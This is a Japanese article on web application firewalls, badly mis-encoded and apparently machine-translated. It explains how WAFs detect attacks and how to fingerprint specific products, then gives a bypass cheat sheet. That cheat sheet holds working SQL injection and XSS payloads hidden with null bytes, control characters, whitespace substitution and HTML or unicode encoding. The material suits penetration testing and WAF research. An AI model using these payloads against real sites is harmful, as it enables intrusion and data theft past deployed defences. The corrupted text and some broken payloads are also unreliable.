
å 容
- ã¯ããã«
- ææ°ã®WAFãšã¯äœã§ããïŒ
- WAFãç¹å®ããŸã
- WAFãã€ãã¹ã®ããŒãã·ãŒã
- å®éã«WAFã移åãã
- ãããã«
ãã®èšäºã¯éåžžã«å€§èŠæš¡ã§ããããšãå€æãããããæè¡å°é家ãšWAFã®äœ¿çšçç±ãèªãããšã«èå³ã®ãªã人ãããã³WAFã®ã¡ã«ããºã ã説æããå¿ èŠã®ãªã人ã¯ãããã«ç·Žç¿ããåé¿çãšäŸãèšå®ããããšãã§ããŸãã
ã¯ããã«
æè¿ãWAFã¯éåžžã«äººæ°ãããããã³ããŒã¯ããŸããŸãªäŸ¡æ Œã«ããŽãªã§å€ãã®ãœãªã¥ãŒã·ã§ã³ãæäŸããå°äŒæ¥ãã倧äŒæ¥ãŸã§ãããŸããŸãªæ¶è²»è ã«ããã±ãŒãžãšãªãã·ã§ã³ãæäŸããŠããŸãã çŸä»£ã®WAFã¯ãWebã¢ããªã±ãŒã·ã§ã³ãä¿è·ããããã®å æ¬çãªããŒã«ãšèŠãªãããå¹ åºãã¿ã¹ã¯ãæã£ãŠããããã人æ°ããããŸãããã®ãããWebã¢ããªã±ãŒã·ã§ã³éçºè ã¯ãããã€ãã®ã»ãã¥ãªãã£åé¡ãåœãŠã«ããããšãã§ããŸãããã ãããã®ãœãªã¥ãŒã·ã§ã³ã¯çµ¶å¯Ÿçãªä¿è·ãä¿èšŒã§ããŸããã

ããã§ãWAFã¯å®éã®ãããžã§ã¯ãã§ãã®å®è£ ãæ£åœåã§ãããã®ã¯äœã§ããããïŒ ãã®äž»ãªæ©èœã¯ãèŠæ±ãæ€åºããŠãããã¯ããããšã§ããWAFåæã«ããã°ãããã€ãã®ç°åžžãããããæ»æãã¯ãã«ã远跡ãããŸãã ãã®ãããªåæã¯ãæ£åœãªãŠãŒã¶ãŒãšWebã¢ããªã±ãŒã·ã§ã³ãšã®çžäºäœçšã劚ãããã®ã§ã¯ãªããåæã«è©Šè¡ãããæ»æãæ£ç¢ºãã€ã¿ã€ã ãªãŒã«æ€åºããå¿ èŠããããŸãã ãã®æ©èœãå®è£ ããããã«ãWAFéçºè ã¯éåžžãæ£èŠè¡šçŸãããŒã¯ã³ãè¡ååæãè©å€åæãæ©æ¢°åŠç¿ã䜿çšããå€ãã®å Žåããããã®ãã¯ãããžãŒã¯ãã¹ãŠäžç·ã«äœ¿çšãããŸãã ããã«ãWAFã¯ä»ã®æ©èœãæäŸã§ããŸãïŒDDoSã«å¯Ÿããä¿è·ãæ»æè ã®IPã¢ãã¬ã¹ã®ãããã¯ãäžå¯©ãªIPã¢ãã¬ã¹ã®è¿œè·¡ãã»ãã¥ãªãã£ããããŒã®è¿œå ïŒX-XSS-ProtectionãX-Frame-Optionsãªã©ïŒãhttpã®è¿œå -Cookieã®ã¿ã®ãã©ã°ãHSTSã¡ã«ããºã ã®å®è£ ãCSRFããŒã¯ã³ã®æ©èœã®è¿œå ã ãŸããäžéšã®WAFã«ã¯JavaScriptã§èšè¿°ãããçµã¿èŸŒã¿ã®ã¯ã©ã€ã¢ã³ãã¢ãžã¥ãŒã«ããããŸãã
ãã¡ãããWAFã¯ããã«ãŒããã³ãã¹ã¿ãŒã®ä»äºã«å€ãã®å°é£ããããããŸãã ãã¡ãããæ»æè ãç¹å®ã®WAFããã€ãã¹ããããã®å¹æçãª0day-wayãç¥ããªãéããè匱æ§ã®æ€åºãšæªçšã¯ããæéããããã¿ã¹ã¯ã«ãªããŸãã WAFã§ä¿è·ãããWebã¢ããªã±ãŒã·ã§ã³ãåæãããšãã«èªåã¹ãã£ããŒã䜿çšããŠãã»ãšãã©åœ¹ã«ç«ã¡ãŸããã WAFã¯ãå°ãªããšãã¹ã¯ãªããããã£ãããµã€ãã確å®ã«ä¿è·ããŸãã ãã ããé©åãªåæ©ãæããªãçµéšè±å¯ãªå°é家ãŸãã¯ããã«ãŒããåé¿çãæ¢ãã®ã«å€ãã®æéãè²»ãããªãããšã決å®ããå ŽåããããŸãã ãããšã¯å¥ã«ãWebã¢ããªã±ãŒã·ã§ã³ãããè€éã§å€æ©èœã«ãªãã°ãªãã»ã©ãæ»æãããå¯èœæ§ã®ããé åã¯å€§ãããªããWAFããã€ãã¹ããæ¹æ³ãèŠã€ãããããªããŸãã
æè¿ãç£æ»ã§é »ç¹ã«ç°ãªãWAFããããŸãããããã€ãã®ã±ãŒã¹ã«ã€ããŠã以äžã§èª¬æããŸãã 2ã€ã®äž»ãªã·ããªãªã§ãããã€ãã®ç¬èªã®WAFãæ¢ã«ãã¹ãããŸããã
- Webã¢ããªã±ãŒã·ã§ã³ã®ç¹å®ã®è匱æ§ãç¥ã£ãŠããããããæªçšããããã«WAFãåé¿ããããšããŠããŸãã
- ç¹å®ã®è匱æ§ã¯äžæã§ãããã¿ã¹ã¯ã¯WAFã«é¢ä¿ãªããããæ€åºããWAFããã€ãã¹ããŠæªçšããããšã§ãã
ããããæåã«ãWAFã®åºæ¬çãªã¡ã«ããºã ã詳ããèŠãŠãããã«ã©ã®ãããªåé¡ãååšããããèŠãŠã¿ãŸãããã
ææ°ã®WAFãšã¯äœã§ããïŒ
WAFããã€ãã¹ããããŸããŸãªæ¹æ³ãå¹æçã«æ€åºããã«ã¯ãå°é家ã¯ææ°ã®ã¯ãšãªåé¡ã¡ã«ããºã ãç解ããå¿ èŠããããŸãã åWAFã¯åå¥ã§ãããç¬èªã®å éšæ§é ãæã£ãŠããŸãããåæã«äœ¿çšãããå žåçãªæ¹æ³ãããã€ããããŸãã ããããèŠãŠã¿ãŸãããã

æ£èŠè¡šçŸã«ãŒã«
æ¢åã®ã»ãšãã©ã®WAFã¯æ£èŠè¡šçŸã«ãŒã«ã«åºã¥ããŠããŸãã ããããäœæããããã«ãããã€ãã®æåãªæ»æã®ã»ãããWAFéçºè ã«ãã£ãŠç 究ãããŠããããã®çµæãéèŠãªæ§ææ§é ã¯æ»æã®ååšãå¯èœã§ãããã©ããã«ãã£ãŠæ±ºãŸããŸãã åŸãããçµæã«åºã¥ããŠããã®ãããªæ§é ãèŠã€ããããšãã§ããæ£èŠè¡šçŸãäœæãããŸãã ãã¹ãŠãã·ã³ãã«ã«æããŸããããã®ã¢ãããŒãã«ã¯ããã€ãã®æ¬ ç¹ããããŸãã æ£èŠè¡šçŸã®é©çšç¯å²ã¯1ã€ã®ã¯ãšãªã«éå®ãããç¹å®ã®ã¯ãšãªãã©ã¡ãŒã¿ã«éå®ãããããšãå€ãããã®ãããªã«ãŒã«ã®æå¹æ§ãæããã«äœäžãããã®ãããªã¡ã«ããºã ã®ããã©ã€ã³ããŸãŒã³ããå€æ°äœæãããŸãã 第äºã«ãæ£èŠè¡šçŸã®æ§æãåçã®æ§æã§çœ®ãæããããšãã§ããããã¹ããããã³ã«ã®è€éãªããžãã¯ãããã³ç°ãªãæåè¡šçŸã®äœ¿çšã«ããããã®ãããªã«ãŒã«ã®äœæã§ãšã©ãŒãçºçããŸãã ãŠã©ãžããŒã«ã»ã€ã¯ããã«ãããã®ãããã¯ã«é¢ããåªããç 究ããããŸãã
ã¹ã³ã¢ãã«ãã£ã³ã°
ãã®ã¡ã«ããºã ã¯ããã¡ã€ã¢ãŠã©ãŒã«ãšãŠã€ã«ã¹å¯Ÿçã®èšèšã«é¢å¿ã®ãã人ãªã誰ã§ãç¥ã£ãŠããã¯ãã§ãã ããèªäœã§ã¯ãæ»æãæ€åºããŸããããä»ã®æ¹æ³ãè£å®ããããæ£ç¢ºã§æè»ã«ããŸãã ããŒã«ã衚瀺ãããçç±ã¯ããªã¯ãšã¹ãã«äœããã®ãçãããããã¶ã€ã³ãååšããã ãã§ã¯ãæ»æãæ€åºããã®ã«ååãªæ¡ä»¶ã§ã¯ãªãããéã«å€æ°ã®èª€æ€åºãšã©ãŒãçºçããå¯èœæ§ãããããã§ãã ãã®åé¡ã¯ããã€ã³ãã·ã¹ãã ãå°å ¥ããããšã§è§£æ±ºãããŸãã ããšãã°ãæ£èŠè¡šçŸã«åºã¥ãåã«ãŒã«ã«ã¯ããã®æäœã®éèŠæ§ã«é¢ããæ å ±ãè£è¶³ãããŸãã ããªã¬ãŒããããã¹ãŠã®ã«ãŒã«ãç¹å®ããåŸããããã®éèŠæ§ãèŠçŽãããŸãã ç¹å®ã®ãããå€ãè¶ ãããšãæ»æãæ€åºããããªã¯ãšã¹ãããããã¯ãããŸãã ãã®ã¡ã«ããºã ã¯ããã®åçŽãã«ããããããããã®ã¯ã©ã¹ã®ã¿ã¹ã¯ã§å®èšŒãããŠãããã©ãã§ã䜿çšãããŠããŸãã
ããŒã¯ãã€ã¶ãŒ
Black Hat 2012ã§ã¯ãæ»æãæ€åºãããã®ã¢ãããŒããC / C ++ libinjectionã©ã€ãã©ãªãšããŠå°å ¥ãããŸãããããã«ãããSQLã€ã³ãžã§ã¯ã·ã§ã³æ»æãè¿ éãã€æ£ç¢ºã«æ€åºã§ããŸãã çŸæç¹ã§ã¯ãPHPãLuaãPythonãªã©ãããŸããŸãªããã°ã©ãã³ã°èšèªçšã®libinjectionã©ã€ãã©ãªã®ããŒãããããŸããå®éãã¡ã«ããºã ã¯ãäžé£ã®ããŒã¯ã³ãšããŠè¡šããã眲åã®æ€çŽ¢ã«èŠçŽãããŸãã äžéšã®çœ²åã¯çµã¿èŸŒã¿ã®ãã©ãã¯ãªã¹ãã«è¿œå ãããç¡å¹ãŸãã¯æªæããããšèŠãªãããŸãã ã€ãŸãããªã¯ãšã¹ããåæããåã«ããŸãããŒã¯ã³ã®ã»ããã«å°ãããŸãã ããŒã¯ã³ã¯ãå€æ°ãæååãéåžžã®æŒç®åãäžæãæ°å€ãã³ã¡ã³ãããŠããªã³ã®ãããªæŒç®åãé¢æ°ãã³ã³ããªã©ãããŸããŸãªã¿ã€ãã«åããããŸãããã®ã¡ãœããã®äž»ãªæ¬ ç¹ã®1ã€ã¯ã次ã®ãããªæ§é ãæ§ç¯ã§ããããšã§ããããŒã¯ã³ã®äžæ£ãªåœ¢æã«ã€ãªããããããªã¯ãšã¹ãã®çœ²åã¯äºæ³ãšã¯ç°ãªããŸãã ãã®ãããªæ§é ã¯éåžžããŒã¯ã³ãã¬ãŒã«ãŒãšåŒã°ããŸããããã«ã€ããŠã¯åŸã»ã©èª¬æããŸãã
è¡ååæ
ã¯ãšãªãã©ã¡ãŒã¿ã§è匱æ§ã®æªçšã®è©Šã¿ãæ€åºããããšã ããWAFã¿ã¹ã¯ã§ã¯ãããŸããã ã¹ãã£ã³ã®è©Šè¡ããã£ã¬ã¯ããªã®ç·åœããæ»æããã¡ãžã³ã°ãã©ã¡ãŒã¿ãŒãããã³èªååããŒã«ã§ãã䜿çšãããè匱æ§æ€åºã®ãã®ä»ã®æ¹æ³ã§æããã«ãªãè匱æ§ãæ€çŽ¢ããæé ãç¹å®ããããšãéèŠã§ãã ããé«åºŠãªWAFã¯ãéåžžã®ãŠãŒã¶ãŒã®åäœã«ãå žåçãªããªã¯ãšã¹ããã§ãŒã³ãæ§ç¯ããæšæºã®åäœãšã¯ç°ãªãé åºã§ãªã¯ãšã¹ããéä¿¡ããè©Šã¿ããããã¯ããæ¹æ³ãç¥ã£ãŠããŸãã ãã®ã¡ã«ããºã ã¯æ»æã«å¯Ÿæããã ãã§ãªããè匱æ§ãèŠã€ããããã»ã¹ãè€éã«ããŸãã 1åãããã®ãªã¯ãšã¹ãæ°ã®å¶éã¯äžè¬çãªãŠãŒã¶ãŒã«ã¯åœ±é¿ããŸããããã¹ãã£ããŒãè€æ°ã®ã¹ã¬ããã§åäœããããã®å€§ããªé害ã«ãªããŸãã
è©å€åæ
ãã¡ã€ã¢ãŠã©ãŒã«ããã³ãŠã€ã«ã¹å¯ŸçããçŽæ¥ç¶æ¿ãããå¥ã®ã¡ã«ããºã ã çŸåšãã»ãšãã©ãã¹ãŠã®WAFã«ã¯ãVPNãµãŒãã¹ãã¢ãããã€ã¶ãŒãTorãããã¯ãŒã¯ããŒããããããããåå è ã®ã¢ãã¬ã¹ã®ãªã¹ããå«ãŸããŠãããçãããã¢ãã¬ã¹ããã®èŠæ±ããããã¯ããããã«äœ¿çšã§ããŸãã ããé«åºŠãªWAFã¯ãããŒã¿ããŒã¹ãèªåçã«æŽæ°ããåæããããã©ãã£ãã¯ã«åºã¥ããŠããŒã¿ããŒã¹ã«è¿œå ãšã³ããªãäœæã§ããŸãã
æ©æ¢°åŠç¿
WAFã§æãç©è°ãéžãåé¡ã®1ã€ã ãã®ã¡ã«ããºã ã¯èª¬æãæãé£ãããããã«ã¯å€ãã®çç±ããããŸãã ããããããæ©æ¢°åŠç¿ãã®æŠå¿µèªäœã¯éåžžã«åºç¯ã§ãããå®éã«ã¯å€ãã®ãã¯ãããžãŒãšãã¯ããã¯ãå«ãŸããŠããããšã«æ³šæãã䟡å€ããããŸãã ããã«ããæ©æ¢°åŠç¿ãã¯AIã¡ãœããã®ã¯ã©ã¹ã®1ã€ã«ãããªããšèŠãªãããŸãã æ©æ¢°åŠç¿ãŸãã¯ãAIã®äœ¿çšãã®ãå®è£ ãã¯ãéåžžã«äººæ°ã®ããããŒã±ãã£ã³ã°ã®åãã§ãã å®éã«ã©ã®ã¡ãœãããã¢ã«ãŽãªãºã ã䜿çšãããŠããããäžæ確ãªå Žåãå€ããWAFã§ã®æ©æ¢°åŠç¿ã¯åãªãè¯ãèšèã§ãããšæ»æè ã®åŽããæãããããšããããŸãã æ©æ¢°åŠç¿ã®å šåãå®éã«åŸæããããšãã§ããããŒã±ãããã¬ãŒã€ãŒã®ãã¡ã圌ãã®çµéšãåãã§å ±æãã人ã¯ã»ãšãã©ããŸããã ãã®ãã¹ãŠãããã®åé¡ãç解ããããšãããå€éšããã®äººãã«ãšã£ãŠã¯ããªãæ²ããçµµã«ãªããŸãã ããã§ããå ¥æå¯èœãªæ å ±ã«åºã¥ããŠãå°ãªããšãããã€ãã®å¥å šãªã¢ã€ãã¢ã匷調ããããåªããŠããŸãã
第äžã«ãæ©æ¢°åŠç¿ã¯å®è¡ã«åºã¥ããããŒã¿ã«å®å šã«äŸåããŠãããããã¯å€ãã®å Žå倧ããªåé¡ã§ãã éçºäŒç€Ÿã¯ãæ¢åã®æ»æãšãã®é©çšæ¹æ³ãææ°ãã€å®å šã«åéããå¿ èŠããããŸãããããã¯ããªãå°é£ã§ãã ãã®ãããå€ãã®ãã³ããŒã¯WAFã®çµæã泚ææ·±ãèšé²ããIDSãSIEMã·ã¹ãã ãæäŸããä»ã®äŒæ¥ãšååããŠãå®éã®æ»æäŸã«ã¢ã¯ã»ã¹ããŸãã 第äºã«ããç空äžã®çç¶ã®Webã¢ããªã±ãŒã·ã§ã³ãã§ãã¬ãŒãã³ã°ãããã¢ãã«ã¯ãå®éã®ã¯ã©ã€ã¢ã³ãWebã¢ããªã±ãŒã·ã§ã³ã«ã€ã³ã¹ããŒã«ãããå ŽåãåçŽã«ç¡å¹ã«ãªãããšããããŸãã æè¯ã®å¹æãåŸãããã«ã¯ãã¯ã©ã€ã¢ã³ãã§ã®WAFå®è£ ã®æ®µéã§è¿œå ã®ã¢ãã«ãã¬ãŒãã³ã°ãå®æœããããšãæ£ãããšèããããŸããããã¯ãè¿œå ã®ã³ã¹ããæéãçµç¹äžã®å°é£ãå¿ èŠãšããæè¯ã®çµæãä¿èšŒãããã®ã§ããããŸããã
WAFãç¹å®ããŸã
WAFéçºè ã¯ãWAFããªã¯ãšã¹ãããããã¯ããããšããŠãŒã¶ãŒã«èŠåããå¥ã®ã¢ãããŒããæã£ãŠããŸãã ãããã£ãŠãæ»æèŠæ±ãžã®å¿çãåæãããšãWebã¢ããªã±ãŒã·ã§ã³ã«ãã£ãŠã©ã®WAFãä¿è·ãããŠããããæ£ç¢ºã«ç解ã§ããŸãã ãã®ããã«ãWAFæçŽãšããçšèªããã䜿çšãããŸãã ããã¯ãäœããã®çç±ã§WAFãæŽæ°ãããŠããªãå Žåã«åœ¹ç«ã¡ãŸãïŒéåžžãããã¯ãªãŒãã³ãœãŒã¹WAFã«é©çšãããŸãïŒã å°æã®WAFéçºè ã顧客ã®é¢åãèŠãŠãèªåæŽæ°ã¡ã«ããºã ãå®è£ ããŸãã ãŸããWAFãç¹å®ã§ããææ°ããŒãžã§ã³ã«æŽæ°ãããããšãå€æããå Žåããšã«ãããç¹å®ã®WAFã«é¢ããæ å ±ã¯ããã®äœæ¥ã®è©³çŽ°ã«ã€ããŠå°ãåŠã¶ã®ã«åœ¹ç«ã¡ãŸãã
WAFãèå¥ã§ããäž»ãªå Žæããªã¹ãããŸãã
- è¿œå ã®ã¯ãããŒ
- åçãŸãã¯ãªã¯ãšã¹ãã«è¿œå ãããããããŒ
- å¿çã®å 容ïŒèŠæ±ããããã¯ããå ŽåïŒ
- å¿çã³ãŒãïŒèŠæ±ã®ãããã¯ã®å ŽåïŒ
- IPã¢ãã¬ã¹ïŒCloud WAFãåç §ïŒ
- JSã¢ãžã¥ãŒã«ïŒã¯ã©ã€ã¢ã³ãåŽWAFïŒ
æ確ã«ããããã«ãããã€ãã®äŸã瀺ããŸãã
PT AF
ããã¯å¿çã³ãŒãïŒ403
å¿çããŒãžã«waf.jsã¯ã©ã€ã¢ã³ãã¢ãžã¥ãŒã«ãåã蟌ãããšãã§ããŸã
å¿çæ¬æãããã¯ããïŒ
<h1>Forbidden</h1> <pre>Request ID: 2017-07-31-13-59-56-72BCA33A11EC3784</pre>
è¿œå ã®ããããŒwaf.jsã¯æ¬¡ãè¿œå ããŸãã
X-RequestId: cbb8ff9a-4e91-48b4-8ce6-1beddc197a30
ãã¡ã·ãã¯ã
ããã¯å¿çã³ãŒãïŒ403
å¿çæ¬æãããã¯ããïŒ
<p style="font-size: 16px; align: center;"> Suspicious activity detected. Access to the site is blocked. If you think that is's an erroneous blocking, please email us at <a href="mailto:nwaf@pentestit.ru">nwaf@pentestit.ru</a> and specify your IP-address. </p>
ãŠã©ãŒã«ã¢ãŒã
ããã¯å¿çã³ãŒãïŒ403
ãªãã·ã§ã³ã®èŠåºãïŒnginx-wallarm
Citrix NetScaler AppFirewall
è¿œå ã®CookieïŒ
ns_af=31+LrS3EeEOBbxBV7AWDFIEhrn8A000; ns_af_.target.br_%2F_wat=QVNQU0VTU0lP TklEQVFRU0RDU0Nf?6IgJizHRbTRNuNoOpbBOiKRET2gA
Mod_SecurityããŒãžã§ã³ 2.9
ããã¯å¿çã³ãŒãïŒ403
å¿çæ¬æãããã¯ããïŒ
<head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /form.php on this server.<br /></p>
Mod_SecurityããŒãžã§ã³ <2.9
ããã¯å¿çã³ãŒãïŒ406ãŸãã¯501
å¿çæ¬æãããã¯ããïŒ
å¿çæ¬æã«ã¯ãmod_securityãMod_SecurityããŸãã¯NOYBããããŸãã
ãã¹ãã¡ã€ã¢ãŠã©ãŒã«
å¿çã«ãã¥ãŒããããŒãè¿œå ããŸãã
X-Varnish: 127936309 131303037. X-Varnish: 435491096 Via: 1.1 varnish-v4
WAFéçºè ã¯ãèŠæ±ããããã¯ãããå Žåã«è¿ãå¿çã³ãŒããèªåã§æ±ºå®ããŸããç¹å®ã®ã³ãŒãããããŸãã ããšãã°ãèŠæ±ããããã¯ãããŠããå Žåãã³ãŒã999ã¯Web_Knight WAFãè¿ããdotDefenderã¯ç©ºã®å¿çæ¬æãŸãã¯ãšã©ãŒã¡ãã»ãŒãžãå«ãã³ãŒã200ãè¿ããŸãã
ãŸããWAFã¯ãä»ã®ã¢ããªã±ãŒã·ã§ã³ãšåæ§ã«ãéçºããã³å€æŽãããããšãå¿ããªãã§ãã ããã ãããã£ãŠãæ¢ç¥ã®ãæçŽãã®é¢é£æ§ãåžžã«ç¢ºèªããããšãéèŠã§ãã ããã«ãéçºè ã¯ä»ã®ã³ã³ãã³ãã§ãããã¯ãããšãã«ã«ã¹ã¿ã ã¬ã¹ãã³ã¹ããŒãžãäœæã§ããŸãã
WAFãã€ãã¹ã®ããŒãã·ãŒã
WAFããã€ãã¹ããæ¹æ³ãèŠã€ãããšããäžè¬çãªèãæ¹ã¯ãæ»æãããWebã¢ããªã±ãŒã·ã§ã³ããŸã ç解ã§ãã圢åŒã«å¿ èŠãªèŠæ±ãæã¡èŸŒãããšã§ãããWAFã«ã¯æ確ã§ã¯ãªãããç¡å®³ã§ãããšæãããŸãã 1ã€ã®ã¿ã€ãã®WAFã¯ãUnicornãTornadoãWeblogicãLighttpdãªã©ã®ãšããŸããã¯ãªãµãŒããŒãå«ãå€æ°ã®ç°ãªãã¿ã€ãã®ãµãŒããŒã«å¯Ÿå¿ã§ããå¿ èŠãããããšã«æ³šæããããšãéèŠã§ããåãµãŒããŒã¯ãHTTPãªã¯ãšã¹ããç°ãªãæ¹æ³ã§è§£æããç°ãªãäŸå€çãªã±ãŒã¹ãèªèã§ããŸãã WAFã§èª¬æãããŸãã ãããã£ãŠãæ»æè ã¯ãWAFããã€ãã¹ããæ¹æ³ãèŠã€ããããã«ãæ»æããããµãŒããŒã®HTTPãªã¯ãšã¹ãã®è§£æã®è©³çŽ°ã䜿çšã§ããŸãã

WAFãåé¿ãããã¹ãŠã®å¯èœãªæ¹æ³ã¯ã䜿çšå¯èœãªWAFä¿è·ã¡ã«ããºã ãŸãã¯ã¢ããªã±ãŒã·ã§ã³ã®åéã«åŸã£ãŠåé¡ããã®ãå°é£ã§ãã åãåé¿çãçžäºæ¥ç¶ããŠãç°ãªãWAFã³ã³ããŒãã³ãã«åæã«åœ±é¿ãäžããããšãã§ããŸãã ãŸããæ»æã®çš®é¡ããšãããã³ã¢ããªã±ãŒã·ã§ã³ã®ç¹å®ã®å Žæããšã®äž¡æ¹ã§ãæ€åºãã€ãã¹æè¡ã®é©çšã®å¯èœæ§ã®ãã倧ããªé åãæ€èšãã䟡å€ããããŸãã 以äžã«èª¬æããææ³ã¯ããªãŒãã³ãœãŒã¹ããåéãããç§ãã¡èªèº«ã®ç 究ã®éçšã§çºèŠãããæãå¹æçãªææ³ã®1ã€ãšããŠå®çããŠããŸãã Bo0oMãšTelegramã®ãã£ã³ãã«ã«æè¬ããŸãã
ç¹æ®æåãè¿œå ãã
ããŸããŸãªç¹æ®æåãWAFã®ããžãã¯ã«éåãããµãŒããŒèªäœã«ç解ãããå¯èœæ§ããããŸãã ç¹æ®æåã®ããªãšãŒã·ã§ã³ãä»»æã§ãããããã¯urlencodeïŒãã ããã»ãšãã©ã®WAFã¯ãããé·ãéæ±ã£ãŠããŸããïŒãŸãã¯ä»ã®ãšã³ã³ãŒãã«å€æã§ããŸãã ãŸãããšã³ã³ãŒãããã«çã®åœ¢åŒã§ãªã¯ãšã¹ãã«ç¹æ®æåãæ¿å ¥ããããšãã§ããŸãããããã¯WAFã«ãšã£ãŠã¯äºæããªãããšã§ãã ããšãã°ããã®åœ¢åŒã®\ r \ n \ r \ nã¯HTTPãªã¯ãšã¹ãã®æ¬äœã®çµãããšããŠèªèãããå¯èœæ§ããããnullãã€ãã¯éåžžãããŸããŸãªããŒã¿åœ¢åŒã®æ£èŠè¡šçŸããã³ããŒãµãŒã®ããžãã¯ã«éåããå¯èœæ§ããããŸãã ASCIIããŒãã«ã®æåã®20æåããã®ä»ã®ç¹æ®æåãæçšã§ãã
䟿å©ãªç¹æ®æåã®äŸïŒ
- 0x00-ãã«ãã€ãã
- 0x0D-ãã£ãªããžãªã¿ãŒã³ã
- 0x0A-æ¹è¡ââ;
- 0x0B-åçŽã¿ãã
- 0x09-æ°Žå¹³ã¿ãã
- 0x0C-æ°ããããŒãž
ãã€ãã¹ãæ€çŽ¢ããå Žåãå€ã«ãã©ã¡ãŒã¿ãŒãå«ããããšã«éå®ãããããªã¯ãšã¹ãæ¬æã®ããŸããŸãªå Žæã«ç¹æ®æåãæ¿å ¥ãããšäŸ¿å©ã§ãã ããšãã°ããªã¯ãšã¹ããJSON圢åŒã§æ瀺ãããå ŽåãJSONã®æåãšæåŸã®äž¡æ¹ã§ããã©ã¡ãŒã¿ãŒã®1ã€ãšãã©ã¡ãŒã¿ãŒã®äž¡æ¹ã«nullãã€ããæ¿å ¥ã§ããŸãã åãããšã¯ãPOSTèŠæ±ã®æ¬æã®ä»ã®åœ¢åŒã«ãåœãŠã¯ãŸããŸãã äžè¬çã«ã¯ãWAFã確èªãŸãã¯è§£æã§ããå Žæãæ¢ããããã«ããããŸããŸãªç¹æ®æåãè©ŠããŠã楜ããããšããå§ãããŸãã
äŸïŒ
{"id":1337,"string0x00":"test' or sleep(9)#"} {"id":1337,"string":"test'/*0x00*/ or sleep(9)#"} {"id":1337,"string"0x0A0x0D:"test' or sleep(9)#"}
<a href="ja0x09vas0x0A0x0Dcript:alert(1)">clickme</a> <a 0x00 href="javascript:alert(1)">clickme</a> <svg/0x00/onload="alert(1)">
id=1337/*0x0C*/1 UNION SELECT version(), user() --
æ確ã«ããããã«ãç¹æ®æåã16é²è¡šèšã«çœ®ãæããŸããã
空çœã®çœ®æ
å¥ã®ã«ããŽãªã§ã¯ãã¹ããŒã¹ãåçã®æåã«çœ®ãæããããšã匷調ãã䟡å€ããããŸãã ããšãã°ãã»ãšãã©ã®æ§æã§ã¯ãããŒã¯ãŒããšæŒç®åã空çœã§åºåããŸããã䜿çšããæåãå³å¯ã«ç€ºããŠããããã§ã¯ãããŸããã ãããã£ãŠãéåžžã®0x20 ïŒã¹ããŒã¹ïŒã 0x0B ïŒåçŽã¿ãïŒã 0x09 ïŒæ°Žå¹³ã¿ãïŒã®ä»£ããã«äœ¿çšã§ããŸãã ãŸãããã®ã«ããŽãªã«ã¯ãã»ãã³ãã£ãã¯ã®è² è·ãæããªãåé¢æ§é ã«ãã空çœæåã®çœ®æãå«ããå¿ èŠããããŸãã ããšãã°ãSQLã§ã¯ãããã¯/ ** / ïŒè€æ°è¡ã®SQLã³ã¡ã³ãïŒã ïŒ\ r \ n ïŒæ¹è¡ã§çµããåäžè¡ã®SQLã³ã¡ã³ãïŒã -\ r \ n ïŒæ¹è¡ã§çµãã代æ¿ã®åäžè¡ã®SQLã³ã¡ã³ãïŒã§ãã 以äžã«äŸã瀺ããŸãã
http://test.com/test?id=1%09union/**/select/**/1,2,3 http://test.com/test?id=1%09union%23%0A%0Dselect%2D%2D%0A%0D1,2,3
èšèªæ§æã䜿çšããŠã¹ããŒã¹ãåé€ããããã«ãåŒãå€æŽããããšãã§ããŸãã ããšãã°ãSQLã§ã¯ãæ¬åŒ§ã䜿çšã§ããŸãã
UNION(SELECT(1),2,3,4,5,(6)FROM(Users)WHERE(login='admin'))
ãããŠãJSã§ã¯/æåã䜿çšããŸãã
<style/onload=confirm(1)>
ãšã³ã³ãŒãã£ã³ã°ã®å€æŽ
ãã®æ¹æ³ã¯ãWAFãç¹å®ã®å Žæã§ããŒã¿ããã³ãŒãããªãããã«ãããŸããŸãªãšã³ã³ãŒãã£ã³ã°ã®äœ¿çšã«åºã¥ããŠããŸãã ããšãã°ã1ã€ã®æåããã®URLã³ãŒãã§çœ®ãæããåŸãWAFã¯ããŒã¿ããã³ãŒãããå¿ èŠãããããšãç解ã§ããããªã¯ãšã¹ããã¹ãããããŸãããåããã©ã¡ãŒã¿ãŒãåãå ¥ããããWebã¢ããªã±ãŒã·ã§ã³ã«ãã£ãŠæ£åžžã«ãã³ãŒããããŸãã
HTMLæåã®10é²è¡šèšïŒ ïŒïŒ106ãŸãã¯ïŒïŒ0000106 ã WAFã¯ïŒæåã®ããŒãžã§ã³ã®ããã«ïŒæåã®çãè¡šçŸãç¥ã£ãŠãããããããŸãããããŒããè¿œå ãããªãã·ã§ã³ã«ã€ããŠã¯ç¥ããªãã®ã§ãæåã®ç·æ°ã¯7ãè¶ ããŠã¯ãããŸãããåæ§ã«ãHTMLæåã®16é²è¡šçŸïŒ ïŒïŒx6AãŸãã¯ïŒïŒx000006A ã
ãŸãã \æåã䜿çšããŠäžéšã®æåããšã¹ã±ãŒãããããªãã¯ããããŸãã次ã«äŸã瀺ããŸãã
<svg/on\load=a\lert(1)>
ãã ããããã¯Webã¢ããªã±ãŒã·ã§ã³ããã®ãããªå ¥åãåŠçããæ¹æ³ã«äŸåããŸãã ã€ãŸããæåã·ãŒã±ã³ã¹\ lã¯ãšã¹ã±ãŒããããlãšããŠè§£éããã1æåã«å€æãããŸãããWAFã¯åæåãåå¥ã«èªèã§ããŸãã ãããã£ãŠãWAFã«ã¯ããŒã¯ãŒãã衚瀺ãããŸããã ãã®ææ³ã䜿çšãããšãæå\ n ã \ r ã \ tããšã¹ã±ãŒãã§ããŸããããããã®æåã¯ãæ¹è¡ããã£ãªããžãªã¿ãŒã³ãããã³ã¿ããšãããŸã£ããç°ãªãæåã«å€æãããããã§ãã
HTMLãšã³ã³ãŒãã¯ãã¿ã°ããããã£å ã§ã䜿çšã§ããŸãã次ã«äŸã瀺ããŸãã
<a href="javascript:alert(1)">clickme</a> <input/onmouseover="javascript:confirm(1rpar;">
ãã®ãããªæåã®ä»£ããã«ãã¿ãŒã²ããæåã®ä»ã®HTMLè¡šçŸã眮ãæããããšã¯å®å šã«å¯èœã§ãã ããŸããŸãªæåå€æãªãã·ã§ã³ãããã«ãããŸã ã
HTMLãšã³ã³ãŒãã«å ããŠã\ uã䜿çšããŠæåãæ¿å ¥ã§ããŸãã
<a href="javascript:\u0061lert(1)">Clickme</a> <svg onload=confir\u006d(1)>
ãŸããç¹æ®æåã®æ¿å ¥ã«é¢é£ãããã¯ãã«ã«è§ŠããŸãã HTMLãšã³ã³ãŒãã§ãã€ããŒããå£ããŸãããïŒ
<a href="ja	vas
cript:alert(1)">clickme</a>
